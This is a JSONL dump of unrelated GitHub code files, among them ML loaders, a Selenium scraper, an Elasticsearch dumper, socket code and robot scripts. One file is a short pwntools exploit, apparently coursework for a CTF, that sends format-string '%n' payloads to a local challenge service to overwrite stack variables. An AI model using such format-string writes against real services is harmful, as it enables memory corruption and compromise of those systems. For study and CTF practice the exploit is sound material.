\"send_message\")\ndef test_complex_delete(mock_send_message):\n cmplx = Complex(physical_location_id=\"test_location_id\",\n resource_version=\"1234\")\n cmplx.delete()\n mock_send_message.assert_called_once_with(\n \"DELETE\",\n \"Delete test_location_id complex\",\n f\"{cmplx.url}?resource-version={cmplx.resource_version}\"\n )\n\n@mock.patch.object(Complex, \"send_message_json\")\ndef test_complex_count(mock_send_message_json):\n mock_send_message_json.return_value = COMPLEXES_COUNT\n assert Complex.count() == 12\n","repo_name":"onap/integration-python-onapsdk","sub_path":"tests/test_aai_complex.py","file_name":"test_aai_complex.py","file_ext":"py","file_size_in_byte":5681,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"39752904711","text":"import sys\nsys.path.append('..')\nfrom utils import param_file_access\nimport tensorflow as tf\n\nslim = tf.contrib.slim\ndataset = slim.dataset\ntfexample_decoder = slim.tfexample_decoder\n\nflags = tf.app.flags\nFLAGS = flags.FLAGS\n\n\n\n\n_ITEMS_TO_DESCRIPTIONS = {\n 'image': 'A color image of varying height and width.',\n 'labels_class': ('A semantic segmentation label whose size matches image.'\n 'Its values range from 0 (background) to num_classes.'),\n}\n\n\n\n\n\ndef get_dataset(list_path, tfrecord_path, label_map_path, ignore_label=255):\n \"\"\"Gets an instance of slim Dataset.\n\n Args:\n list_path: Path of sample list file.\n tfrecord_path: Tfrecord file path corresponding to list.\n label_map_path: Path of sample label map file.\n\n Returns:\n An instance of slim Dataset.\n\n \"\"\"\n \n num_samples = len(param_file_access.get_txt_params(list_path))\n num_classes = len(param_file_access.get_json_params(label_map_path))\n\n\n # Specify how the TF-Examples are decoded.\n keys_to_features = {\n 'image/encoded': tf.FixedLenFeature(\n (), tf.string, default_value=''),\n 'image/filename': tf.FixedLenFeature(\n (), tf.string, default_value=''),\n 'image/format': tf.FixedLenFeature(\n (), tf.string, default_value='jpeg'),\n 'image/height': tf.FixedLenFeature(\n (), tf.int64, default_value=0),\n 'image/width': tf.FixedLenFeature(\n (), tf.int64, default_value=0),\n 'image/segmentation/class/encoded': tf.FixedLenFeature(\n (), tf.string, default_value=''),\n 'image/segmentation/class/format': tf.FixedLenFeature(\n (), tf.string, default_value='png'),\n }\n items_to_handlers = {\n 'image': tfexample_decoder.Image(\n image_key='image/encoded',\n format_key='image/format',\n channels=3),\n 'image_name': tfexample_decoder.Tensor('image/filename'),\n 'height': tfexample_decoder.Tensor('image/height'),\n 'width': tfexample_decoder.Tensor('image/width'),\n 'labels_class': tfexample_decoder.Image(\n image_key='image/segmentation/class/encoded',\n format_key='image/segmentation/class/format',\n channels=1),\n }\n\n decoder = tfexample_decoder.TFExampleDecoder(\n keys_to_features, items_to_handlers)\n\n return dataset.Dataset(\n data_sources=tfrecord_path,\n reader=tf.TFRecordReader,\n decoder=decoder,\n num_samples=num_samples,\n items_to_descriptions=_ITEMS_TO_DESCRIPTIONS,\n num_classes=num_classes,\n ignore_label=ignore_label,\n name='pascal_voc_seg',\n multi_label=True)\n","repo_name":"KoapT/tf_train","sub_path":"projects/deeplab_v3plus/src/datasets/segmentation_dataset.py","file_name":"segmentation_dataset.py","file_ext":"py","file_size_in_byte":2601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41967530560","text":"import 
math \ndef Calculate_Distance_Nodes(lat01,lat02,long01,long02):\n R=6378.137 #km\n lat01=float(lat01)\n lat02=float(lat02)\n long01=float(long01)\n long02=float(long02)\n dLat=(lat02-lat01)*(math.pi/180)\n dLong=(long02-long01)*(math.pi/180)\n Lat01torad=lat01*math.pi/180\n Lat02torad=lat02*math.pi/180\n Value_a=math.sin(dLat/2)*math.sin(dLat/2)+math.cos(Lat01torad)*math.cos(Lat02torad)*math.sin(dLong/2)*math.sin(dLong/2)\n Value_b=2*math.atan(math.sqrt(Value_a)/math.sqrt(1-Value_a))\n Distance=R*Value_b\n\n return Distance\ndef Calculate_Distance_Way(latlong): #takes 2 nodes same time and calulate all ways\n Distance_ways = 0\n\n for i in range(1, len(latlong)):\n a = latlong[i - 1]\n b = latlong[i]\n\n lat1 = a['lat']\n lat2 = b['lat']\n long1 = a['long']\n long2 = b['long']\n\n Distance2nodes = Calculate_Distance_Nodes(lat1, lat2, long1, long2)\n Distance_ways += Distance2nodes\n\n return Distance_ways","repo_name":"TrangNhaBui/Openstreetmap-Length-Calculation","sub_path":"Length_Calculation.py","file_name":"Length_Calculation.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42180748134","text":"from turtle import Turtle\n\n\nclass Paddle(Turtle):\n def __init__(self, position=\"right\"):\n super().__init__()\n self.color(\"white\")\n self.penup()\n self.shape(\"square\")\n self.shapesize(stretch_wid=5, stretch_len=1)\n self.speed(\"fastest\")\n if position == \"left\":\n self.goto(-350, 0)\n else:\n self.goto(350, 0)\n\n def up(self):\n if self.ycor() < 240:\n self.goto(self.xcor(), self.ycor() + 20)\n\n def down(self):\n if self.ycor() > -240:\n self.goto(self.xcor(), self.ycor() - 20)\n\n\n","repo_name":"Aineken/python-projects","sub_path":"days/day 22 - arcade game/paddle.py","file_name":"paddle.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"636786151","text":"import boto3\nimport csv\nimport os\n\ns3_client = boto3.client('s3')\ndynamodb = boto3.resource('dynamodb')\n\ndef lambda_handler(event, context):\n bucket_name = 'your-bucket-name' # Replace with your own bucket name\n file_name = 'your-file-name.csv' # Replace with your own file name\n table_name = 'your-table-name' # Replace with your own table name\n\n # Download the CSV file from S3\n s3_client.download_file(bucket_name, file_name, '/tmp/' + file_name)\n\n # Open the CSV file and parse the data\n with open('/tmp/' + file_name, 'r') as csv_file:\n csv_reader = csv.reader(csv_file)\n next(csv_reader) # Skip the header row\n for row in csv_reader:\n item = {\n 'id': row[0],\n 'name': row[1],\n 'description': row[2],\n 'price': row[3]\n }\n \n # Add the item to the DynamoDB table\n table = dynamodb.Table(table_name)\n table.put_item(Item=item)\n\n # Clean up the temporary file\n os.remove('/tmp/' + file_name)\n\n return {\n 'statusCode': 200,\n 'body': 'Data loaded successfully to DynamoDB table'\n }\n","repo_name":"felvinerepo/MicroService_Team_A","sub_path":"newfileMS1.py","file_name":"newfileMS1.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71513461607","text":"import SpellShop\nclass Character():\n def __init__(self):\n self.PlayerName = \"Player Name\"\n self.CharName = \"Character Name\"\n self.race = \"DWARF\"\n self.maxhealth = 20\n self.health = 20\n self.gold = 100\n # 1 = Anytime\n # 2 = 
Movement\n # 3 = Basic Attack\n # 4 = Spell\n self.actions = [3,4,2,1]\n self.stats = []\n self.spells = []\n self.pos_Race = [\"DWARF\", \"ELF\", \"GNOME\",\"CROWN\", \"BEAST\", \"MANDOZIAN\", \"CATHARINES\", \"ENORKANS\", \"XENOKIAN\", \"VESTIAN\", \"SWORD\", \"HERGSOIGISE\"]\n def ChangePlayerName(self, NewName):\n self.PlayerName = NewName\n def ChangeCharacterName(self, NewName):\n self.CharacterName = NewName\n def ChangeHealth(self, amount):\n self.health = self.health + amount\n if self.health > self.maxhealth:\n self.health = self.maxhealth\n if self.health <= 0:\n self.health = 0\n def ChangeRace(self):\n current = self.pos_Race.index(self.race)\n if current+1 > len(self.pos_Race)-1:\n self.race = self.pos_Race[0]\n else:\n self.race = self.pos_Race[current+1]\n def ChangeAction(self, space):\n self.actions[space] = self.actions[space]+1\n if self.actions[space] >4:\n self.actions[space] = 1\n def ChangeGold(self, amount):\n self.gold = self.gold + amount\n def AddSpell(self, SpellName):\n Spells = SpellShop.Shop()\n for i in range(0,len(Spells.SpellList)):\n if Spells.SpellList[i][0] == SpellName:\n self.spells.append(Spells.SpellList[i])\n return None\n def RemoveSpell(self, SpellName):\n for i in range(0,len(self.spells)):\n if self.spells[i][0] == SpellName:\n del self.spells[i]\n return None\n \n","repo_name":"Ghureg/VDND","sub_path":"CharTracker/libs/Char.py","file_name":"Char.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41470130726","text":"from .EsController import EsController\n\n\nclass EsDumper:\n indices = {\n \"latvia\": {\n \"consulate\": \"latv_cons\",\n \"visaac\": \"latv_visaac\",\n \"news\": \"latv_news\",\n },\n \"poland\": {\"consulate\": \"pol_cons\", \"visaac\": \"pol_visaac\", \"news\": \"pol_news\"},\n \"lithuania\": {\n \"consulate\": \"lith_cons\",\n \"visaac\": \"lith_visaac\",\n \"news\": \"lith_news\",\n },\n \"thailand\": {\n \"consulate\": \"thai_cons\",\n \"visaac\": \"thai_visaac\",\n \"news\": \"thai_news\",\n },\n \"spain\": {\n \"consulate\": \"spain_cons\",\n \"visaac\": \"spain_visaac\",\n \"news\": \"spain_news\",\n },\n }\n\n CONSULATE = \"consulate\"\n VISA_CENTER = \"visaac\"\n NEWS = \"news\"\n\n def __init__(self):\n self.es_controller = EsController()\n\n def add_consulates(self, consulates, index_name):\n for index, consulate in enumerate(consulates):\n self.es_controller.add_data(\n index_name,\n index + 1,\n {\n \"address\": consulate[\"ADRESS\"],\n \"email\": consulate[\"EMAIL\"],\n \"telephone1\": consulate[\"PHONE_NUMBER_1\"],\n \"telephone2\": consulate[\"PHONE_NUMBER_1\"],\n \"worktime\": consulate[\"WORKING_HOURS\"],\n },\n )\n\n def add_visa_centers(self, visa_centers, index_name):\n for index, visa_center in enumerate(visa_centers):\n self.es_controller.add_data(\n index_name,\n index + 1,\n {\n \"address\": visa_center[\"ADRESS\"],\n \"email\": visa_center[\"EMAIL\"],\n \"issue_worktime\": visa_center[\"ISSUE_WORKING_HOURS\"],\n \"apply_worktime\": visa_center[\"APPLY_WORKING_HOURS\"],\n \"telephone1\": visa_center[\"PHONE_NUMBER\"],\n \"telephone2\": \"null\",\n },\n )\n\n def add_news(self, news, index_name):\n for index, news_item in enumerate(news):\n self.es_controller.add_data(\n index_name,\n index + 1,\n {\n \"date\": news_item[\"DATE\"],\n \"title\": news_item[\"TITLE\"],\n \"body\": news_item[\"BODY\"],\n \"link\": news_item[\"LINK\"],\n },\n )\n\n def init_indices(self, data, country):\n [\n 
self.es_controller.delete_index(index)\n for index in [\n EsDumper.indices[country][\"consulate\"],\n EsDumper.indices[country][\"visaac\"],\n EsDumper.indices[country][\"news\"],\n ]\n ]\n self.add_consulates(data[\"CONSULATE\"], EsDumper.indices[country][\"consulate\"])\n self.add_visa_centers(data[\"VISAAC\"], EsDumper.indices[country][\"visaac\"])\n self.add_news(data[\"NEWS\"], EsDumper.indices[country][\"news\"])\n","repo_name":"svyatjes/visa_app","sub_path":"flask_app/es/EsDumper.py","file_name":"EsDumper.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35091586588","text":"import csv\nimport datetime\nimport os\nimport traceback\n\nimport undetected_chromedriver as uc\nfrom selenium.webdriver.common.by import By\nfrom seleniumbase import page_actions\n\nfrom models import BorderCapture, Camera, database\nfrom send_msg import logger, send_to_qu\nfrom utils import retry\n\nRETRY_ATTEMTPS = 5\n\n\n@retry(retries=RETRY_ATTEMTPS)\ndef fetch_image(url, location):\n\n if not url:\n url = os.environ[\"URL\"]\n if not location:\n location = os.environ[\"URL_LOCATION\"]\n\n options = uc.ChromeOptions()\n options.add_argument(\"--no-sandbox\")\n options.add_argument(\"--headless=chrome\")\n options.add_argument(\"--disable-gpu\")\n options.add_argument(\"--disable-dev-shm-usage\")\n driver = uc.Chrome(options=options, driver_executable_path=\"./chromedriver\")\n\n try:\n try:\n # Check the database connection before fetching the image\n database.connect(reuse_if_open=True)\n except:\n logger.error(traceback.format_exc(limit=1))\n raise Exception(\"Database connection can not be established.\")\n\n driver.get(url)\n\n page_actions.wait_for_element(driver, selector=\"videoImage\", by=By.ID)\n\n image = driver.find_element(By.ID, \"videoImage\")\n image_name = str(int(datetime.datetime.utcnow().timestamp())) + \".png\"\n\n image_location = location + \"/\" + image_name\n\n # Save image to folder with a relative location\n image.screenshot(\"./data/\" + image_location)\n\n assert image_name in os.listdir(\"./data/\" + location + \"/\")\n logger.info(\n f\"[parser] Successfuly fetched an image - {image_name} at {location}!\"\n )\n\n camera_id = Camera.get_or_create(location_name=location)[0].id\n\n model = BorderCapture.create(\n camera_id=camera_id,\n image_path=os.getcwd() + \"/data/\" + image_location,\n )\n database.close()\n except Exception as e:\n driver.quit()\n raise e\n driver.quit()\n # ID is of type UUID, thus conversion req.\n return str(model.id)\n\n\nif __name__ == \"__main__\":\n\n with open(\"urls.csv\", \"r\") as f:\n\n sources = csv.reader(f)\n\n for row in sources:\n\n url, location = row\n\n image_id = fetch_image(url, location)\n send_to_qu(image_id)\n","repo_name":"kturaevv/border_guard","sub_path":"parser/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18282769307","text":"import socket\r\nfrom random import randint\r\n\r\nClientSocket = socket.socket()\r\nhost = '127.0.0.1'\r\nport = 1233\r\n\r\ndef Convert(string):\r\n list1=[]\r\n list1[:0]=string\r\n return list1\r\n\r\nprint('Waiting for connection')\r\ntry:\r\n ClientSocket.connect((host, port))\r\nexcept socket.error as e:\r\n print(str(e))\r\n\r\nResponse = ClientSocket.recv(1024)\r\nprint(Response.decode('utf-8'))\r\n\r\nClientSocket.send(str.encode('Hello from Party 
1'))\r\nResponse = ClientSocket.recv(1024)\r\nprint(Response.decode('utf-8'))\r\ndata1 = ClientSocket.recv(4096)\r\nClientSocket.send('OK'.encode())\r\ndata2 = ClientSocket.recv(4096)\r\nClientSocket.send('OK'.encode())\r\nnum1 = ClientSocket.recv(1024)\r\nClientSocket.send('OK'.encode())\r\ndata3 = ClientSocket.recv(4096)\r\n\r\nx1 = []\r\ny1 = []\r\nx2 = []\r\n\r\ndata1 = data1.decode('utf-8')\r\nfor i in range(len(data1)):\r\n if(data1[i]!= ' ' and data1[i]!= ',' and data1[i]!= '[' and data1[i]!= ']' ):\r\n x1.append(int(data1[i]))\r\nprint(x1)\r\n \r\n\r\n\r\n# Convert decoded data into list\r\n\r\ndata2 = data2.decode('utf-8')\r\nfor i in range(len(data2)):\r\n if(data2[i]!= ' ' and data2[i]!= ',' and data2[i]!= '[' and data2[i]!= ']' ):\r\n y1.append(int(data2[i]))\r\nprint(y1)\r\n\r\n\r\ndata3 = data3.decode('utf-8')\r\nfor i in range(len(data3)):\r\n if(data3[i]!= ' ' and data3[i]!= ',' and data3[i]!= '[' and data3[i]!= ']' ):\r\n x2.append(int(data3[i]))\r\nprint(x2)\r\n\r\nstrings1 = num1.decode('utf8')\r\n#get the num\r\nr = int(strings1)\r\n\r\nprint(\"x1 = \", x1, \"y1 = \", y1, \"x2 = \", x2, \"r = \",r)\r\n\r\nprint(len(x1), len(x2), len(y1))\r\na = []\r\n\r\n\r\nfor i in range(r):\r\n x = x1[i]^x2[i]\r\n a.append(x)\r\n\r\nprint(\"a = \", a)\r\n\r\nClientSocket.close()\r\n\r\n","repo_name":"anjali13s/CSP_Project","sub_path":"optimally fair implementation/client1_moran.py","file_name":"client1_moran.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7082445899","text":"# -*- coding: utf-8 -*-\nfrom typing import Tuple, Union\nfrom typing import Callable\nimport pandas as pd\nimport numpy as np\nfrom src.si.data.dataset import Dataset\nfrom src.si.statisics.f_classification import f_classification\n\n\nclass SelectPercentile:\n\n def __init__(self, percentile: float = 0.25, score_func: Callable = f_classification) -> None:\n self.score_func = score_func\n self.percentile = percentile\n #parametros estimados\n self.F = None\n self.p = None\n\n def fit(self, dataset: Dataset):\n '''\n Estimates the F and p for each feature using the scoring_func\n\n :param dataset: a given dataset\n :return: self\n '''\n\n #estima o F e p para cada feature usando a scoring_func ;\n # retorna o self (ele próprio)\n\n self.F, self.p = self.score_func(dataset)\n\n return self\n\n def transform(self, dataset: Dataset) -> Dataset:\n '''\n Selects the features with the highest F value up to the indicated percentile.\n (for a dataset with 10 features and a 50% percentile, the transform should select\n the 5 features with higher F value)\n\n :param dataset: a given dataset\n :return: dataset\n '''\n\n #seleciona as features com valor de F mais alto até ao\n # percentil indicado. 
Por exemplo, para um dataset com 10 features e um\n # percentil de 50%, o teu transform deve selecionar as 5 features com valor\n # de F mais alto\n\n #tamanho do dataset\n length = len(dataset.features)\n #tamanho com percentile\n percentile_mask = int(length * self.percentile)\n\n #multiplicação ao longo do eixo /// retorna uma matriz de índices\n ## quanto maior o F, a diferença vai ser mais significativa por isso selecionamos o maior f\n\n # retorna por ordem crescente os index do F,\n #valores mais baixos/vai buscar ao contrario as 10 melhores com o '-'\n idxs = np.argsort(self.F)[-percentile_mask:]\n features = np.array(dataset.features)[idxs]\n\n return Dataset(X=dataset.X[:, idxs], y=dataset.y, features=list(features), label=dataset.label)\n\n def fit_transform(self, dataset: Dataset) -> Dataset:\n '''\n Runs the fit and then the transform\n\n :param dataset: a given dataset\n :return: transformed dataset\n '''\n self.fit(dataset)\n return self.transform(dataset)\n\n\nif __name__ == '__main__':\n percentile = SelectPercentile(0.50)\n dataset = Dataset(X=np.array([[0, 1, 2, 3],\n [0, 2, 4, 6],\n [1, 3, 5, 7]]),\n y=np.array([0, 1, 2]),\n features=[\"f1\", \"f2\", \"f3\", \"f4\"],\n label=\"y\")\n percentile = percentile.fit_transform(dataset)\n print(dataset.features)\n print(percentile.features)","repo_name":"carinaa9/si","sub_path":"src/si/feature_selection/select_percentile.py","file_name":"select_percentile.py","file_ext":"py","file_size_in_byte":2899,"program_lang":"python","lang":"pt","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"8798827229","text":"N = int(input())\na = list(map(int,input().split()))\nmod = 998244353\ndp = [[0]*10 for _ in range(N)]\ndp[0][a[0]] = 1\nfor i in range(1,N):\n for j in range(10):\n for k in range(10):\n if (a[i]+k)%10 == j:\n dp[i][j] += dp[i-1][k]%mod\n if (a[i]*k)%10 == j:\n dp[i][j] += dp[i-1][k]%mod\nfor i in range(10):\n print(dp[-1][i]%mod)\n# print(dp)","repo_name":"shimamura10/Atcoder","sub_path":"過去問/単発/220d.py","file_name":"220d.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74397836967","text":"# @Time : 2018/6/15 17:44\n# @Author : cap\n# @FileName: myGevent.py\n# @Software: PyCharm Community Edition\nimport gevent\nfrom gevent import monkey\n\nmonkey.patch_all()\nfrom socket import *\n\n\ndef handle(c):\n while True:\n data = c.recv(1024).decode()\n if not data:\n break\n else:\n print(data)\n c.send(b'i have received')\n\n\ndef server():\n s = socket()\n s.bind('0.0.0.0', 9000)\n s.listen()\n\n while True:\n c, addr = s.accept()\n print('connect from', addr)\n gevent.spawn(handle, c)\n","repo_name":"zhnin/mypython","sub_path":"modules/gevent/myGevent.py","file_name":"myGevent.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33516287723","text":"# (c) 2014 Amplify Education, Inc. 
All rights reserved, subject to the license\n# below.\n#\n# Education agencies that are members of the Smarter Balanced Assessment\n# Consortium as of August 1, 2014 are granted a worldwide, non-exclusive, fully\n# paid-up, royalty-free, perpetual license, to access, use, execute, reproduce,\n# display, distribute, perform and create derivative works of the software\n# included in the Reporting Platform, including the source code to such software.\n# This license includes the right to grant sublicenses by such consortium members\n# to third party vendors solely for the purpose of performing services on behalf\n# of such consortium member educational agencies.\n\nimport csv\nimport argparse\n\n\ndef main(csv_file):\n with open(csv_file, encoding='utf-8') as cfile:\n c_reader = csv.reader(cfile)\n for row in c_reader:\n out_str = [empty_str_to_none(val) for val in row]\n print(tuple(out_str), ',', sep='')\n\n\ndef empty_str_to_none(value):\n '''Convert any empty string to None'''\n if value == '':\n return None\n return value\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser('csv_to_tup')\n parser.add_argument('-c', '--csv_file', help='name of csv file', required=True)\n args = parser.parse_args()\n\n main(args.csv_file)\n","repo_name":"SmarterApp/RDW_DataWarehouse","sub_path":"edudl2/scripts/misc/csv_to_tuple_str.py","file_name":"csv_to_tuple_str.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"70315462887","text":"import os\nimport sys\nimport time\nimport argparse\n\nimport numpy as np\nimport tensorflow as tf\n\n\nclass TensorFlowInfer:\n \"\"\"\n Implements TensorFlow inference of a saved model, following the same API as the TensorRTInfer class.\n \"\"\"\n\n def __init__(self, saved_model_path):\n gpus = tf.config.experimental.list_physical_devices('GPU')\n for gpu in gpus:\n tf.config.experimental.set_memory_growth(gpu, True)\n\n self.model = tf.saved_model.load(saved_model_path)\n self.pred_fn = self.model.signatures['serving_default']\n\n # Setup I/O bindings\n self.batch_size = 1\n self.inputs = []\n fn_inputs = self.pred_fn.structured_input_signature[1]\n for i, input in enumerate(list(fn_inputs.values())):\n self.inputs.append({\n 'index': i,\n 'name': input.name,\n 'dtype': np.dtype(input.dtype.as_numpy_dtype()),\n 'shape': [1, 512, 512, 3], # This can be overridden later\n })\n self.outputs = []\n fn_outputs = self.pred_fn.structured_outputs\n for i, output in enumerate(list(fn_outputs.values())):\n self.outputs.append({\n 'index': i,\n 'name': output.name,\n 'dtype': np.dtype(output.dtype.as_numpy_dtype()),\n 'shape': output.shape.as_list(),\n })\n\n def override_input_shape(self, input, shape):\n self.inputs[input]['shape'] = shape\n self.batch_size = shape[0]\n\n def input_spec(self):\n return self.inputs[0]['shape'], self.inputs[0]['dtype']\n\n def output_spec(self):\n return self.outputs[0]['shape'], self.outputs[0]['dtype']\n\n def infer(self, batch):\n # Process I/O and execute the network\n input = {self.inputs[0]['name']: tf.convert_to_tensor(batch)}\n output = self.pred_fn(**input)\n return output\n\n def process(self, batch, scales=None, nms_threshold=None):\n # Infer network\n output = self.infer(batch)\n\n # Extract the results depending on what kind of saved model this is\n boxes = None\n scores = None\n classes = None\n if len(self.outputs) == 1:\n # Detected as AutoML Saved Model\n assert len(self.outputs[0]['shape']) == 3 and 
self.outputs[0]['shape'][2] == 7\n results = output[self.outputs[0]['name']].numpy()\n boxes = results[:, :, 1:5]\n scores = results[:, :, 5]\n classes = results[:, :, 6].astype(np.int32)\n elif len(self.outputs) >= 4:\n # Detected as TFOD Saved Model\n assert output['num_detections']\n num = int(output['num_detections'].numpy().flatten()[0])\n boxes = output['detection_boxes'].numpy()[:, 0:num, :]\n scores = output['detection_scores'].numpy()[:, 0:num]\n classes = output['detection_classes'].numpy()[:, 0:num]\n\n # Process the results\n detections = [[]]\n normalized = (np.max(boxes) < 2.0)\n for n in range(scores.shape[1]):\n if scores[0][n] == 0.0:\n break\n scale = self.inputs[0]['shape'][2] if normalized else 1.0\n if scales:\n scale /= scales[0]\n if nms_threshold and scores[0][n] < nms_threshold:\n continue\n detections[0].append({\n 'ymin': boxes[0][n][0] * scale,\n 'xmin': boxes[0][n][1] * scale,\n 'ymax': boxes[0][n][2] * scale,\n 'xmax': boxes[0][n][3] * scale,\n 'score': scores[0][n],\n 'class': int(classes[0][n]) - 1,\n })\n return detections\n\n\ndef main(args):\n print(\"Running in benchmark mode\")\n tf_infer = TensorFlowInfer(args.saved_model)\n input_size = [int(v) for v in args.input_size.split(\",\")]\n assert len(input_size) == 2\n tf_infer.override_input_shape(0, [args.batch_size, input_size[0], input_size[1], 3])\n spec = tf_infer.input_spec()\n batch = 255 * np.random.rand(*spec[0]).astype(spec[1])\n iterations = 200\n times = []\n for i in range(20): # Warmup iterations\n tf_infer.infer(batch)\n for i in range(iterations):\n start = time.time()\n tf_infer.infer(batch)\n times.append(time.time() - start)\n print(\"Iteration {} / {}\".format(i + 1, iterations), end=\"\\r\")\n print(\"Benchmark results include TensorFlow host overhead\")\n print(\"Average Latency: {:.3f} ms\".format(\n 1000 * np.average(times)))\n print(\"Average Throughput: {:.1f} ips\".format(\n tf_infer.batch_size / np.average(times)))\n\n print()\n print(\"Finished Processing\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-m\", \"--saved_model\", required=True,\n help=\"The TensorFlow saved model path to validate against\")\n parser.add_argument(\"-i\", \"--input_size\", default=\"512,512\",\n help=\"The input size to run the model with, in HEIGHT,WIDTH format\")\n parser.add_argument(\"-b\", \"--batch_size\", default=1, type=int,\n help=\"The batch size to run the model with\")\n args = parser.parse_args()\n main(args)\n","repo_name":"NVIDIA/TensorRT","sub_path":"samples/python/efficientdet/infer_tf.py","file_name":"infer_tf.py","file_ext":"py","file_size_in_byte":5252,"program_lang":"python","lang":"en","doc_type":"code","stars":8187,"dataset":"github-code","pt":"53"} +{"seq_id":"32805334112","text":"'''\n- Immanuel - 2006463162\n- Pradipta Davi Valendra - 2006462664\n- Tara Mazaya Lababan - 2006473535\n\nPenjelasan:\nPayload berupa format string yang akan mengubah nilai variabel pada stack. 
\nDiurutkan berdasarkan nilai variable terkecil hingga terbesar.\n'''\nfrom pwn import *\n\nBINARY = ['./chall']\nIP, PORT = 'localhost', 7777\n\np = remote(IP, PORT)\n\npayload = b'%10c%4$n' # ----> nilai variabel (d) akan diubah menjadi 10\npayload += b'%1$5c%5$n' # ----> nilai variabel (e) akan diubah menjadi 10 + 5 = 15\npayload += b'%1$15c%2$n' # ----> nilai variabel (b) akan diubah menjadi 15 + 15 = 30\npayload += b'%1$15c%1$n' # ----> nilai variabel (a) akan diubah menjadi 30 + 15 = 45\npayload += b'A%3$n' # ----> nilai variabel (c) akan diubah menjadi 45 + 1 = 46\n\np.sendline(payload)\nsleep(1)\nprint(p.recv().decode(errors='ignore'))\n","repo_name":"valordra/ctf99_tools","sub_path":"Soal kelompok/kelompok7.py","file_name":"kelompok7.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"id","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"75339901608","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport matplotlib \n\n# 设置matplotlib正常显示中文和负号\nmatplotlib.rcParams['font.sans-serif']=['SimHei'] # 用黑体显示中文\nmatplotlib.rcParams['axes.unicode_minus']=False # 正常显示负号\n\ndata=np.loadtxt(\"reject_sampling.txt\")\nplt.hist(data, bins=114,density=True,facecolor=\"blue\", edgecolor=\"black\", alpha=0.7)\n# 显示横轴标签\nplt.xlabel(r\"$x$\")\n# 显示纵轴标签\nplt.ylabel(r\"probability density\")\nplt.show()","repo_name":"kaizewang/Computational_Physics_A","sub_path":"07_data_curve/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"36772917392","text":"\r\n# this script will print on the terminal screen the Robot internal battery voltage\r\n# and Cozmo will speak alout the cube's battery percentage capacity remaining.\r\n# I have still to find out at what point the cube batteries fail\r\n# Bob 25th Feb 2018\r\n# This is Version 2 Change is that the internal battery voltage now only reports to 3 decimal places for brevity.\r\n# Bob 04th Mar 2018\r\n\r\n\r\nimport asyncio\r\nimport cozmo\r\nfrom cozmo.objects import LightCube1Id, LightCube2Id, LightCube3Id\r\n\r\nasync def log_cube_info(robot: cozmo.robot.Robot, cube_id):\r\n cube = robot.world.get_light_cube(cube_id)\r\n if cube is not None:\r\n # Wait for up to few seconds for the cube to have received battery level info\r\n for i in range(30):\r\n if cube.battery_voltage is None:\r\n if i == 0:\r\n cozmo.logger.info(\"Cube %s waiting for battery info...\", cube_id)\r\n await asyncio.sleep(0.5)\r\n else:\r\n break\r\n cozmo.logger.info(\"Cube %s battery = %s\", cube_id, cube.battery_str)\r\n #await robot.say_text (\"My internal Battery Voltage Currently is: %s\" % robot.battery_voltage,).wait_for_completed()\r\n await robot.say_text (\"cube %s battery = %s \" %(cube_id, cube.battery_str)).wait_for_completed()\r\n print(\"cube %s battery = %s \" %(cube_id, cube.battery_str))\r\n \r\n else:\r\n \r\n cozmo.logger.warning(\"Cube %s is not connected - check the battery.\", cube_id)\r\n \r\n\r\nasync def cozmo_program(robot: cozmo.robot.Robot):\r\n \r\n print(\"My internal Battery Voltage Currently is: %.3f\" % robot.battery_voltage)\r\n \r\n \r\n \r\n await log_cube_info(robot, LightCube1Id) # looks like a paperclip\r\n await log_cube_info(robot, LightCube2Id) # looks like a lamp / heart\r\n await log_cube_info(robot, LightCube3Id) # looks like the letters 'ab' over 'T'\r\n await robot.say_text (\"My internal Battery Voltage Currently is: %.3f Volts\" % 
